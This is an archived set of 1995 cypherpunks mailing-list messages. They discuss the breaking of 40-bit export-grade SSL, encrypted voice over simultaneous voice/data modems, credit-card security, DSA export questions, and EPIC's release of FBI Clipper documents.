In-Reply-To: <199508161526.LAA06595@pipe3.nyc.pipeline.com>
Message-ID: <LAA06255.199508161544@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain



Hit me please.

  :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Wed, 16 Aug 95 12:58:03 PDT
To: die@die.com
Subject: Purple Boxes
In-Reply-To: <9508160230.AA01456@pig.die.com>
Message-ID: <199508161935.MAA23741@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


>	I reiterate my suggestion of a few months ago that
> one could quite easily adapt the firmware on one of the new simultanious
> data and digital voice on the same phone line modems to incorperate
> encryption, and quite possibly encryption/key exhange interoperable
> with some mode of PGPphone. 

I've looked at the AT&T simultaneous voice and data stuff (VoiceSpan),
and from what I can determine from reading between the lines, the
voice stuff is not really digitized (a la PCM), rather it is just
pushed around somewhere else in the spectrum.  The data is apparently
modulated using a variant on QAM, and the data rate varies dynamically
depending on whether or not you are saying anything.

As I recall the block diagram is ...

				+-----------+	    +--------+
             analog voice <---> |           |  	    | 	     |<--- TIP
			        | Modem IC  |<----> |  DAA   |
	digital bitstream <--->	|           |	    |        |<--- RING
				+-----------+	    +--------+


You can get data sheets from AT&T Microelectronics.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 09:41:14 PDT
To: www-buyinfo@allegra.att.com
Subject: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <v02120d01ac57cb36e14b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>SSL challenge -- broken

Indeed, it seems so, and the feeding frenzy in the press has begun.

I zinged this over from cypherpunks to www-buyinfo this morning, and this
afternoon I got a rather interesting call from a reporter.  I told him
about ITARs, its effect on internet commerce and the silliness of a 40 bit
key, etc.

He wanted to know if I knew Damien's phone number(!), and I told him to
have ATT put one of their translators-for-hire on the line and call INRIA,
Ecole Polytechnique, or Ecole Normale Superieure, and track him down there.

Meanwhile, if Mr. Doligez sees this, call Alan Beck at 619-625-0700, or
email him at alan@tgc.com.

I can see the headlines now: "Netscape Security Broken, Stock Falls".

Make-a the Ganglia Twitch. Haven't had this much fun since the hogs ate my
little brother...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Wed, 16 Aug 95 09:55:27 PDT
To: www-buyinfo@allegra.att.com
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <199508161654.MAA25878@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't think that there is any serious worry for Netscape. Their
security is fine-- it's just crippled by the US Government. They
could probably start distributing binary versions of their software
that used full 128 bit keys in several hours. It's just that the
Government gets pissed off about these things.

In general, it just adds more flames to the fire started by the 
letter written by Microsoft, IBM and Lotus. Their point is bolstered
by this easy attack. 

-Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 16 Aug 95 04:08:14 PDT
To: gt7508b@prism.gatech.edu
Subject: Re: Purple Boxes
Message-ID: <9508161105.AA21087@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
> slow for realistic real time hardware voice/data encryption??)

We have implemented a public-key system in smartcards. The secret
key is completely generated and hidden inside the card. The public
key system is TESS (RFC1824). An authenticated key exchange is
perform by the card in about one second.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 16 Aug 95 10:39:46 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Purple Boxes
In-Reply-To: <199508160843.BAA25109@ix9.ix.netcom.com>
Message-ID: <9508161739.AA02917@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 10:30 PM 8/15/95 -0400, Dave Emery wrote:
> >	I reiterate my suggestion of a few months ago that
> >one could quite easily adapt the firmware on one of the new simultanious
> >data and digital voice on the same phone line modems to incorperate
> >encryption, and quite possibly encryption/key exhange interoperable
> >with some mode of PGPphone.

> Most modems I've seen only have one set of audio interfaces,
> and a bump-in-the-cord phone needs two (one for the voice side,
> one for the modem line side.)  (Having two jacks doesn't count.)
> So you'd need at least two modems, one straight and one re-educated,
> and you'd probably need lots more flash ROM than the average modem has.

	The kind of modem I was refering to is designed to supply a
digital voice connection interleaved with 28.8 kb V.34 high speed data
over a common modem connection.  As such it has an extra audio A/D and
D/A and line interface; in fact some of these modems actually have a
full telco CO type phone line interface so one can plug in a regular
vanilla phone and talk full duplex over the digital path just as on an
analog phone line.  They are already trully bump-in-the-cord devices. 

	These modems are a new product, just being introduced, and are
apparently aimed at the service desk/tech support market where they
supply the capability for someone diagnosing a problem to have the
customer's screen display on their system and access their keyboard
while talking to the customer about what is wrong.   (As a historical
note, I was involved in the development of this technology at
Data General in the late 70's using fdm data over voice analog signalling
- the reason it didn't catch on was that the modem connection was
very slow (300 baud)).

	There is an effort in the modem industry to standardize the
voice compression used and the protocol so such modems will interoperate
with those made by other manufacturers  - I don't think anybody has
addressed encryrption in this protocal (after all, the NSA has kept
encryption out of the data side of modems where it would be trivial
to implement).

	As for the ROM size issue - I'm sure if one was expecting to
be able to drop in PGPphone code relatively unmodified it would
be a problem, but actually implmenting the core encryption and crypto sync
stuff would only be a few tens of kb of code at most in a ROM that
may well be 512 kb or more now with significant space reserved for
expansion and bug fixes and support of older modem protocols.

							Dave Emery
							die@die.com

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Wed, 16 Aug 95 11:05:41 PDT
To: pcw@access.digex.net
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508161804.AA26353@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
|   From: Peter Wayner <pcw@access.digex.net>
|   
|   I don't think that there is any serious worry for Netscape. Their
|   security is fine-- it's just crippled by the US Government. They
|   could probably start distributing binary versions of their software
|   that used full 128 bit keys in several hours. It's just that the
|   Government gets pissed off about these things.

The netscape client already has these capabilities built in. During the
negotiation stage, the client talks to the server, which announces which
strength to use. For exported versions of both the client and the server
they are limited to 40 bit RC4. For US versions, all available strengths
are supported with an option to enable them.

Pull up Netscape, and for the URL type: "about:". It will tell you which
algorithms are used, but not their key bit length. 

When you configure their Commerce server, you have the option to enable
any of the supported bit lengths and algorithms, including RC2 and RC4,
IDEA, 40 -> 128 bits, 64 -> 192 for DES.

Netscape's server, since it must service foreign requests, probably doesn't
even waste its time asking for >40 bit, since that would add to the time
it takes to negotiate a common scheme.

If anyone has any insight into this, please fill me in. I just wanted to
clarify a few things.

Steve

--
Steve Champeon
Technical Lead, Imonics Web Services





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 16 Aug 95 11:33:43 PDT
To: jim@acm.org
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <199508161832.OAA19556@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> > Hal <hfinney@shell.portal.com> writes:
> > I am a little alarmed by the suggestion that this news could have some
> > marked impact on the Netscape stock price.  From our perspective this was
> > certainly an unsurprising result (not to take anything away from Damien
> 
> So far it appears not to have had an effect.  The two web pages I know about
> that track Netscape show it holding steady a point and a half above where it
> opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
> it, despite my attempts at manipulating that market.

I haven't seen any news stories about this on the wire
services. Someone would have to write a story about it first before
people would know...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 11:46:00 PDT
To: Hal <cypherpunks@toad.com
Subject: Re:  SSL challenge -- broken !
Message-ID: <v02120d03ac57ebddeb94@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:45 PM 8/16/95, Hal wrote:
>I am a little alarmed by the suggestion that this news could have some
>marked impact on the Netscape stock price.


My apologies for causing alarm. I was merely making a too-subtle joke about
hysteria in the press and the capital markets for Netscape, and its
inevitable backlash.

Madness of crowds and all that...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@openmind.com (Doug Cutrell)
Date: Wed, 16 Aug 95 14:57:38 PDT
To: cypherpunks@toad.com
Subject: Question:  DSA status and export requirements?
Message-ID: <v02120d0bac581ace1ca9@[204.214.106.202]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if there have been any major developments in the DSA
patent issue in the past year?  I've read that some large companies have
used DSA in products without paying royalties to Bizdos, but they also have
separate licensing deals for RSA itself.

On another note, I would much appreciate advice on whether a product which
does only signature verification using, say, DSA and SHA, would require
ITAR export approval?  I've read that the NSA has specifically stated that
they are not concerned with products that cannot be easily used for privacy
-- so would such a product (which can verify but not generate signatures)
even be required to apply for an export license?

Doug Cutrell
doug@OpenMind.com

________________________________________________
fuck the Exxon Communications Decency ammendment 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 16 Aug 95 12:59:15 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: FBI Files on Clipper Releas
Message-ID: <n1403533785.38465@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


FOR RELEASE:  August 16, 1995, 2:00 p.m. EST

CONTACT: David Sobel (202) 544-9240

               FBI FILES: CLIPPER MUST BE MANDATORY


	WASHINGTON, DC - Newly-released government documents show 
that key federal agencies concluded more than two years ago that 
the "Clipper Chip" encryption initiative will only succeed if 
alternative security techniques are outlawed.  The Electronic 
Privacy Information Center (EPIC) obtained the documents from the 
Federal Bureau of Investigation under the Freedom of Information 
Act.  EPIC, a non-profit research group, received hundreds of 
pages of material from FBI files concerning Clipper and 
cryptography.

	The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of Clipper technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that the Clipper "key-escrow 
encryption" technique would only serve its stated purpose if made 
mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department 
of Justice (DOJ).

	In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded 
that:

     Technical solutions, such as they are, will only work if 
     they are incorporated into *all* encryption products.  
     To ensure that this occurs, legislation mandating the 
     use of Government-approved encryption products or 
     adherence to Government encryption criteria is required.

	Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States 
is controlled, domestic use is not regulated."  The report 
concludes that "a national policy embodied in legislation is 
needed."  Such a policy, according to the FBI, must ensure "real-
time decryption by law enforcement" and "prohibit[] cryptography 
that cannot meet the Government standard."

	The FBI conclusions stand in stark contrast to public 
assurances that the government does not intend to prohibit the use 
of non-escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

     As the Administration has made clear on a number of 
     occasions, the key-escrow encryption initiative is a 
     voluntary one; we have absolutely no intention of 
     mandating private use of a particular kind of 
     cryptography, nor of criminalizing the private use of 
     certain kinds of cryptography.

 	According to EPIC Legal Counsel David Sobel, the newly-
disclosed information "demonstrates that the architects of the 
Clipper program -- NSA and the FBI -- have always recognized that 
key-escrow must eventually be mandated.  As privacy advocates and 
industry have always said, Clipper does nothing for law 
enforcement unless the alternatives are outlawed."

	Scanned images of several key documents are available via the 
World Wide Web at the EPIC Home Page:

		http://www.epic.org/crypto/ban/fbi_dox/



                              -30-



_________________________________________________________________________
Subject: FBI Files on Clipper Released
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 16 Aug 95 13:10:39 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <199508161654.MAA25878@access5.digex.net>
Message-ID: <9508162008.AA00722@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Peter Wayner writes:

| I don't think that there is any serious worry for Netscape. Their
| security is fine-- it's just crippled by the US Government. They
| could probably start distributing binary versions of their software
| that used full 128 bit keys in several hours. It's just that the
| Government gets pissed off about these things.

	I'm not sure I trust their security.  I know I have no reason
to; their server comes as 14.9mb of object code.  I know of no vendor
who ships a bug free 14mb product.  (To be more than fair, most of
those binaries are relatively small, on the order of 250k.)  As RTM,
Sr asked, if your programs are buggy, what does that say about their
security?

	(Not that I'm offering up exploits; simply saying that I
suspect there are problems, and that those problems can make whatever
security SSL does or doesn't offer moot).

	The operative question is not one of 'what is the cost of
breaking SSL relative to the financial gain?' but 'what is the cost of
breaking or bypassing SSL relative to the risk involved and the
financial gain?'

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Buck <jbuck@Synopsys.COM>
Date: Wed, 16 Aug 95 16:15:55 PDT
To: Damien.Doligez@inria.fr
Subject: Re: SSL challenge -- broken !
Message-ID: <199508162315.QAA04306@deerslayer.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations on demonstrating the effort required to break SSL with
a 40-bit key.  It seems clear demonstrated that this is not adequate to
store, say, company-confidential information for communication over
insecure networks, since it seems the average grad student at a large
university could get access to similar computing power that you used
(spare cycles on a hundred workstations or more).

However, I disagree with your conclusion:

> Many people have access to the amount of computing power that I used.
> The exportable SSL protocol is supposed to be weak enough to be
> easily broken by governments, yet strong enough to resist the attempts
> of amateurs.  It fails on the second count.  Don't trust your credit
> card number to this protocol.

Your credit card number, expiration date, etc, are continually being
revealed to minimum-wage clerks all the time, unless you never use the
card.  A chain is only as strong as its weakest link; it makes no sense to
buy an expensive lock when your door has a big enough opening to climb
through.  Should some bad person get hold of your card number and misuse
it, you're not out any money: you just tell the card company "I didn't buy
that".  Since there's so much tracing in the system, if you buy a physical
something with a stolen credit card number it can usually be traced to you
(who'd they ship the package to?).  It's not clear to me that *any*
encryption is really essential if the only purpose is to protect credit
card #'s from snoopers.

There's plenty of stuff that *does* need protection, but I'm not sure
credit card #'s head the list.

Q: Of the 20,000 credit card #'s stolen from Netcom's computer, how many
were used to buy things?  Answer: not sure, but expect the answer is "zero".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 16 Aug 95 13:40:23 PDT
To: perry@piermont.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161832.OAA19556@frankenstein.piermont.com>
Message-ID: <199508162039.QAA27638@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> I haven't seen any news stories about this on the wire
> services. Someone would have to write a story about it first before
> people would know...

I've suggested this to a few reporters I know..

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 16 Aug 95 13:45:28 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: Purple Boxes
In-Reply-To: <199508161935.MAA23741@comsec.com>
Message-ID: <9508162044.AA03254@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain




> 
> I've looked at the AT&T simultaneous voice and data stuff (VoiceSpan),
> and from what I can determine from reading between the lines, the
> voice stuff is not really digitized (a la PCM), rather it is just
> pushed around somewhere else in the spectrum.  The data is apparently
> modulated using a variant on QAM, and the data rate varies dynamically
> depending on whether or not you are saying anything.
> 
> As I recall the block diagram is ...

	We had a discussion about this on this list a while back.  I've
been following the matter elsewhere and it is certainly true that some
of the proprietary stuff and the proposed standard are fully digital
packet interleaved digital CLEP coded voice.

	It would be possible to use the echo cancelling technology of
modern modems (which subtract out the transmit signal to leave the receive)
to subtract out both the transmit and receive digital signals (QAM
by the way for v.32 and v.34) and leave just the residual noise which
could be voice at a very low level.  Whether one could get an adaquate 
bit error rate (even with the trellis coding) from the far end data signal
given the worst case line loss if the signal was mixed with low level
voice I do not know.

	In any case if the analog voice under QAM data trick was
actually used, one could have a reasonable security analog masking type
scrambler for free by sending random digital data down the line in both
directions (such as data derived from Johnson noise or radioactive
decay).  There would be no easy way for a third party to filter out the
digital data (unless of course the interloper had a four wire tap on the
line with good enough directionality to demodulate the data in both
directions with a reasonable BER). 

							Dave Emery
							die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 15:20:50 PDT
To: alan@tgc.com>
Subject: Erroneous HPCwire phone #
Message-ID: <v02120d01ac581e8fffdf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Whoops...

Hope this helps!

Cheers,
Bob Hettinga


--- begin forwarded text

Date: Sat, 12 Aug 95 04:22:08 PST
From: "Alan Beck" <alan@tgc.com>
X-Minuet-Version: Minuet1.0_Beta_4
Reply-To: <alan@newsmaster.tgc.com>
X-Popmail-Charset: English
To: rah@shipwright.com
Subject: Erroneous HPCwire phone #

Robert,
    I can't reach my managing editor, who's a cypherpunk subscriber,
so I'm emailing you:  HPCwire's telephone number was posted
incorrectly.  Our real number is: 619-625-0070.  I'd appreciate
it if you could revise the post.  Thanks much!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Alan Beck                                                   HPCwire
Associate Editor                                   8445 Camino Santa Fe
HPCwire                                                      Suite 204
alan@hpcwire.tgc.com                          San Diego, Calif. 92121
Voice: 619/625-0070                                  Fax: 619/625-0088

    For a free trial subscription, email: <trial@hpcwire.tgc.com>

         ~~ Diagonally parked in a parallel universe. ~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 16 Aug 95 16:53:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <v0151010bac5841656d54@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger <perry@piermont.com> writes:
>Joe Buck writes:
>> However, I disagree with your conclusion:
>>
>> > Don't trust your credit card number to this protocol.
>>
>> Your credit card number, expiration date, etc, are continually being
>> revealed to minimum-wage clerks all the time, unless you never use the
>> card.
>
>On the other hand, those clerks can be traced down in most cases and
>have fairly limited numbers of cards they get. It might be very
>profitable to run a vacuum cleaner operation on the net slurping down
>credit card number or other confidential information and then selling
>it in bulk to people who could exploit it.

Most credit card companies ship their registration information off shore to
low tech developing countries. The idea is that the people entering the
information are unlikely to be able to exploit the information they are
exposed to.

Capturing a set of credit card tapes is certainly profitable, as would be
capturing large volumes of numbers, as you suggest. Now, are those West
African credit fraud rings dialing up DEC, SUN, and SGI? :-)

DJK

P.S. There could be an article in tomorrows WSJ about the SSL Challenge.
The technical details and facts will surely be mangled. :-(







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 16 Aug 95 16:25:22 PDT
To: Joe Buck <jbuck@synopsys.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508162315.QAA04306@deerslayer.synopsys.com>
Message-ID: <199508162324.TAA00306@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe Buck writes:
> However, I disagree with your conclusion:
> 
> > Don't trust your credit card number to this protocol.
> 
> Your credit card number, expiration date, etc, are continually being
> revealed to minimum-wage clerks all the time, unless you never use the
> card. 

On the other hand, those clerks can be traced down in most cases and
have fairly limited numbers of cards they get. It might be very
profitable to run a vacuum cleaner operation on the net slurping down
credit card number or other confidential information and then selling
it in bulk to people who could exploit it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Buck <jbuck@Synopsys.COM>
Date: Wed, 16 Aug 95 19:25:19 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508170140.VAA40390@tequesta.gate.net>
Message-ID: <199508170224.TAA05372@deerslayer.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain



> >Your credit card number, expiration date, etc, are continually being
> >revealed to minimum-wage clerks all the time, unless you never use the
> >card.  A chain is only as strong as its weakest link; it makes no sense to
> >buy an expensive lock when your door has a big enough opening to climb
> >through.  Should some bad person get hold of your card number and misuse
> >it, you're not out any money: 
> 
> I'm not so sure....Checked the fees/interest lately?
> "There ain't no such thing as a free credit card theft."

Yes, it's true that this contributes to high interest rates (though
defaults cost more than fraud).

> >you just tell the card company "I didn't buy
> >that".  Since there's so much tracing in the system, if you buy a physical
> >something with a stolen credit card number it can usually be traced to you
> >(who'd they ship the package to?).  
> 
> They only *sometimes* find the person/loot.

Doesn't matter, this is a disincentive to theft and you are never liable
unless you lost your physical card.

> OK, but I had an idea a number of years ago. It's not too new,
> either, and considering the BILLION$ in credit-card fraud, I think
> the credit card companies could implement it with little trouble at
> every site the cards are used.

It would cost billions to get every single merchant that accepts credit
cards set up with PIN equipment.

> Why not PIN numbers. Banks and their
> customers are already used to them, they could be entered over the
> phone (I know, not too secure) or in person, and considering the
> dollar ammount of the current fraud, they would be cheap (I think).
> [There is probably a flaw in my idea, but I haven't found it.]

You have to make sure the clerk that gets your order doesn't see the
PIN (so you need a secure path between you and your credit card co.
that avoids the merchant).  And what about the tellers?  Do you know
how badly they are treated?  They can get all those #'s.  Yes, it
can be done: ATMs are set up that way.  But as long as it's not done,
those who scream at the horrors of sending credit card #'s over the
net aren't thinking clearly.

Never forget that social engineering is the easiest hack.  Technical
solutions that ignore wide-open social engineering paths are worse
than useless (worse because they give an illusion of security).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 16 Aug 95 11:10:48 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508161810.AA05369@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hal sez:
[..]
: I am a little alarmed by the suggestion that this news could have some
: marked impact on the Netscape stock price.  From our perspective this was
: certainly an unsurprising result (not to take anything away from Damien
: and others who worked on it).  It is a useful reminder that the things we
: work on here can have profound consequences.

Just to bad Ecash and the ON-Line Stock/Options Broker [TM] aren't available,
would be a good time to buy some put options on Netscape Communications.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 16 Aug 95 17:22:17 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <n1403533785.38465@epic.org>
Message-ID: <9508170022.AA19096@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Banisar quotes FBI documents obtained via the FOIA:
>      Technical solutions, such as they are, will only work if 
>      they are incorporated into *all* encryption products.  
>      To ensure that this occurs, legislation mandating the 
>      use of Government-approved encryption products or 
>      adherence to Government encryption criteria is required.

...meanwhile...
> Testifying before a Senate Judiciary 
> Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
> Harris asserted that:
> 
>      As the Administration has made clear on a number of 
>      occasions, the key-escrow encryption initiative is a 
>      voluntary one; we have absolutely no intention of 
>      mandating private use of a particular kind of 
>      cryptography, nor of criminalizing the private use of 
>      certain kinds of cryptography.

By exactly what mechanism are appointed (hired ?) officials such as AAG Harris
supposedly accountable to the public ?  Can they be brought up on perjury
charges ?  Just what real legal recourse do we have against lying scum in the
bureaucracy ?  Are we stuck unless we can get some Congresscritter to cry
foul on the floor of the House or Senate ?

-Futplex <futplex@pseudonym.com>
"you said too much; and what you said, it was a lie" -EMF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Wed, 16 Aug 95 21:04:04 PDT
To: pcw@access.digex.net
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508170403.AA20845@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


jweis wrote: 
> I have to agree, Netscape may spend some energy to upgrade their 
> encryption, but it really won't buy them all that much.   SSL, to me, is 
> like using a "security envelope" to mail cash or putting the club on your 
> car.  It presents just enough of an obstacle to keep honest people honest.

This is the problem of using "physical" world analogies with the network.
A similar argument that is posited is that "Sure its not 100% secure but
its better than the carbons from a receipt (now gone) or people who
don't shred their garbage." I respond that the network isn't the "real"
world so the laws of physics don't apply. Someone in Boston MA is unlikely
to fly into Sunnyvale to paw through my garbage, but it would be "trivial"
for them to see my receipt go flashing by can throw some spare compute
cycles at breaking it. A snooper/cracker program on a "spare" machine
might yield a half dozen credit cards a week. 

I prefer the attitude of better vigilance through layered encryption. That
is the transaction might be 40bit RC4 but the "jewels" (otherwise known
as the credit authorization information) should be DES3. 

--Chuck

Just my opinion of course.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 16 Aug 95 18:33:35 PDT
To: cypherpunks@toad.com
Subject: genetic software patents (fwd)
Message-ID: <Pine.SOL.3.91.950816212608.27837F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
 
     Sometime ago, I reported on a recent discovery of how gene sequences
can be used for mathematical optimization calculations.  The method,
developed by Leonard Adelman (the "A" of RSA) provided a way of solving
the Traveling Salesman Problem using gene sequences (interestingly, the
paper by Hopfield that kicked off the neural network revival also solved
the TSP).  Computable genes blurs even more hardware and software (along
with hardware/software codesign tools), but has yet to sink into PTO
statutory and prior art thinking.

    In any event, the August 1995 issue of Dr. Dobb's Journal, page 127,
has a nicely illustrated article titled "Biochemical techniques take on
combinatorial problems".  If you or your clients are interested in this
new form of computing, get a copy of the article.  Adelman's original paper
titled "Molecular Computation of Solutions to Combinatorial Problems" and
was in the November 11, 1994 issue of Science.

    While you are at it, get a copy of an article that appeared in the
July 27, 1995 issue of Nature, page 307, titled "Protein molecules as
computational elements in living cells".  It starts out "Many proteins in
living cells appear to have as their primary function the transfer and
processing of information, rather than chemical transformation of metabolic
intermediates or the building of cellular structures".  Yet one more blur
or "hardware" and "software".  Geneware?

    A final article to get is "Circuit simulation of genetic networks",
appearing in the August 4, 1995 issue of Science, page 650.  It proposes
to simulate genetic networks (such as the bacteriophage lambda lysislysogeny
decision circuit) using the tools found in hardware/software codesign tools.
With VHDL as a digital circuit language, and AHDL as a analog circuit language,
are we going to need GHDL as a genetic circuit language?

    It is not hard to imagine in the future some VHDL code being mapped into
software with standard translators, into hardware using cell libraries, and
into gene sequences using sequence libraries interface to EDA design tools.
Properly structured sets of claims under the Doctrine of Equivalents could
claim coverage in all types of domains (in fact, the claims could be generated
by the design tool itself using a "cell" library of claim clauses).
Alternatively entire libraries of medical journals suddenly become potential
software/hardware prior art.



     While practical use of the gene technique is years off, it does raise
the issue of how the PTO is going to handle the prior art aspects, when
gene technology now becomes software and hardware prior art (as soon as, if
ever, the PTO first solves the software-software prior art problem, and then
the software/hardware codesign prior art problem).  Scientists are blurring
the lines of computing much faster than the PTO can respond; for example, the
proposed software patent guidelines reflect none of the above developments.

     Together these three papers represent the cutting cutting edge of issues
that will be affecting the patenting world in the years to come. Read them
now to get a jump.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 18:42:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
Message-ID: <199508170140.VAA22967@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Futplex <futplex@pseudonym.com> writes:

<FBI document excerpt obtained through FOIA snipped>

>...meanwhile...

<Directly contrary Senate Judiciary Subcommittee testimony
